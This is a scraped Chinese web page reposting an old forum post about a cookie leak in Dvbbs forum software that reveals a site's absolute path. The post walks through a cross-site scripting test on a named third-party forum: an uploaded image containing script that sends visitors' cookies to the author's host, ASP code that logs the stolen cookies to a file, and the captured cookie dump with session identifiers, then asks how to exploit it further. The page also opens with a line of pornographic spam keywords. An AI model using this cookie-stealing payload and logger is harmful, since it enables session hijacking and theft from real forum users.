好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > 關于動網的cookie瀉露站點絕路徑的問題

關于動網的cookie瀉露站點絕路徑的問題
熱門標簽:不同的地圖標注 寧夏保險智能外呼系統哪家好 隨州銷售外呼系統平臺 激戰黃昏地圖標注說明 怎么更改地圖標注電話 溫嶺代理外呼系統 交行外呼系統有哪些 防城港市ai電銷機器人 臨滄移動外呼系統哪家有
一、跨站測試
先看看我的一次跨站測試吧
我以職業欠錢的站點做測試吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的論談上傳兩張圖,
圖一的內容是:
script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie/script>
得到url為UploadFile/2005-6/200562716565777847.jpg
圖二則是偶的個人照
UploadFile/2005-6/200562716563048909.jpg
寫個盜cookie的代碼到我的空間,lcx的盜cookie代碼有問題,所以修改了一下。
%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString"br>")
cookiefile.close
set fs = nothing
%>
META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下來,點擊圖一,自動轉到圖二,

二、結果分析
再到我的空間看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218usercookies=1StatUserID=2190418138password=想要嗎?嘿嘿userhidden=2userclass=%D0%C2%CA%D6%C9%CF%C2%B7username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIMbr>
分析cookie我們不難看出他的絕對路徑是e:\wwwroot\zhiyeqianqian\wwwroot


三、論談
本來,最初的測試我是在測試BCT論談,成功暴出他的絕對路徑,一開始的時候,我還認為可能又是動網出洞洞了,所以又去測試了其它幾個站,測試結果是其它的站點并沒有暴出路徑,今天再次測試“欠我錢”的論談,卻又暴不出來,查了一下代碼,和別人的代碼一個樣,根本沒什么差別。
偶想聽聽大家的看法,到底是哪里出了問題,能不能深入利用~~~

標簽:沈陽 忻州 阜陽 哈密 紅河 無錫 青海 河源

巨人網絡通訊聲明:本文標題《關于動網的cookie瀉露站點絕路徑的問題》,本文關鍵詞  關于,動網,的,cookie,瀉露,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《關于動網的cookie瀉露站點絕路徑的問題》相關的同類信息!
  • 本頁收集關于關于動網的cookie瀉露站點絕路徑的問題的相關信息資訊供網民參考!
    • 推薦文章